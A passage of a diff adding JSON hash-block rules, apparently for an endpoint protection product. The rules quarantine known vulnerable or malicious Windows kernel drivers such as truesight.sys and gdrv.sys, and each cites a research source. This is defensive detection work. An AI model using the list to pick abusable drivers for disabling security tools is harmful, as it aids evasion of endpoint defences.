+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea3c5569405ed02ec24298534a983bcb5de113c18bc3fd01a4dd0b5839cd17b9",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://ioctl.fail/echo-ac-writeup/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf75b9ea-20b8-5f8e-a57e-66f3d9ca38c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143653Z",
+ "creation_date": "2026-03-23T11:45:31.143657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1aa30ae6070876f539cb14013730d3d2d9ca3c805474d638d5b8c97bb101d44",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfa30aac-8827-5dfe-a5c5-7dec3c184f50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620278Z",
+ "creation_date": "2026-03-23T11:45:29.620280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620285Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfad995b-2bca-5c3c-988b-f8d4b32dfa82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815933Z",
+ "creation_date": "2026-03-23T11:45:31.815935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24add6fcd09dda0b3ef57d8fa53d5d45b63aecd3e4b2d754259aa70a288e997f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfbae45d-5a13-576a-a925-4b5eecdf87fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617149Z",
+ "creation_date": "2026-03-23T11:45:29.617151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7841ee6dac956cc0923368d6722063a19c9fa131e55c6f3b7484cce78d826f0",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfc56eea-275a-59e9-8931-ed4badd8e632",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143853Z",
+ "creation_date": "2026-03-23T11:45:32.143855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6a5ef968bd0e47e1ca9433f8e8d0b9bed0aa0a3baf982fdc27b1cc3b4b857b8",
+ "comment": "Vulnerable Kernel Driver (aka wnbios.sys) [https://www.loldrivers.io/drivers/baa168cd-eba2-42e4-95e9-47cb4b2f9094/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfce2f03-01d9-557c-80ee-bf0cce65bf79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487891Z",
+ "creation_date": "2026-03-23T11:45:31.487893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ce4ba2b520f8fc976a61f918d2f45affae7c9ea7cdaaeda17b820bdb2403a4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfd2c98b-f642-5ab4-b12a-59d6236a39f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978301Z",
+ "creation_date": "2026-03-23T11:45:29.978302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533",
+ "comment": "Vulnerable Kernel Driver (aka nt5.sys) [https://www.loldrivers.io/drivers/193df066-c27c-4343-a4eb-ad2ac417a4cc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfdc6746-3d3c-5cf3-9ca7-693ecf696f1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813533Z",
+ "creation_date": "2026-03-23T11:45:31.813536Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3e6015aad30c38d738387901350ea9ac362c09fb6e95c5cf2121b071a03a3d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfde6dd4-0ebd-5112-8755-67dcf74f1eb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141716Z",
+ "creation_date": "2026-03-23T11:45:31.141718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141723Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f6274c200454803cc82c9d595750fd7a0ad7f10ded56c42b3e42011024fea87",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfedc4ce-2464-5073-8e41-51b0167a1138",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155984Z",
+ "creation_date": "2026-03-23T11:45:31.155986Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf392302c14e22524c7fba846f62db690bbb0658a587d5025b7b9782e629a727",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bff29c72-5b94-58b4-9bf3-e4050d3d7f06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980046Z",
+ "creation_date": "2026-03-23T11:45:29.980049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a47b9af109988e8e033886638edc84964968eecd0d24483eafaad6a6d68005ea",
+ "comment": "Malicious Kernel Driver (aka wantd.sys) [https://www.loldrivers.io/drivers/892292f9-b87c-40a5-80e5-8c9b02914e8b/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bfffad42-0996-5acf-b852-93d126b84b8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826425Z",
+ "creation_date": "2026-03-23T11:45:30.826427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7716c3c62cf88db90fcd0b60854479a16dded16c91812544a77db3121f2eb8bd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c00856ea-bf67-511c-843d-4b76f615c7ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827218Z",
+ "creation_date": "2026-03-23T11:45:30.827220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfd936baaeb51542d04609043ed166b6a2a4e826e5e0e506757e8960fa3b03de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c009df39-95fb-5c7a-9556-8ed074067f80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976853Z",
+ "creation_date": "2026-03-23T11:45:29.976855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a149695e1eeef8c4728f091be7d64304d7e00c8a2f27adc7d96a111de15a79b",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c00f329c-e5af-5a5a-81da-fc09c6df712b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827049Z",
+ "creation_date": "2026-03-23T11:45:31.827051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827057Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17308b1c03775e40fc1b37d8414502c81624b4d52c04875e8de1a496eccb808d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c01739ab-02b7-5ec3-a457-442a4c6769b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148677Z",
+ "creation_date": "2026-03-23T11:45:31.148679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "930e0cf02d9a9146b1dd20c76f66826b624ead0e06cfd846d72bd7db61b2a086",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c01a4dc9-1302-5a55-b7f9-435fa669fe99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609076Z",
+ "creation_date": "2026-03-23T11:45:29.609078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81aafae4c4158d0b9a6431aff0410745a0f6a43fb20a9ab316ffeb8c2e2ccac0",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c01a6684-9ee9-5967-8bad-a32d96b9074a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142611Z",
+ "creation_date": "2026-03-23T11:45:31.142613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d91d3ab359d4a166dac86de0ce5a1fbed39f4ca088e0b86f84c7c8939e6a7692",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0232b97-f92b-5e42-a6b0-741e624acf8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821413Z",
+ "creation_date": "2026-03-23T11:45:30.821417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d474ea066d416ded9ed8501c285ca6b1c26a1d1c813c8f6bd5523eeb66c5d01e",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0279a45-b00d-5e31-9adc-0a565c41d537",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977532Z",
+ "creation_date": "2026-03-23T11:45:29.977534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a334bdf0c0ab07803380eb6ef83eefe7c147d6962595dd9c943a6a76f2200b0d",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c02ae058-2788-5b39-93bb-7c9ab9faf70c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145677Z",
+ "creation_date": "2026-03-23T11:45:31.145679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ace913c9b494fd607a1e60796ad768ea1b61ff134d1e58b96843ebdb43986a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0478a06-a376-5c77-bfa5-8ac95f61709a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145200Z",
+ "creation_date": "2026-03-23T11:45:31.145202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b6e6cd2ae8ffbda7595f079535e30b68f5d0586d3cdf0f263eb5ef403ec592c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
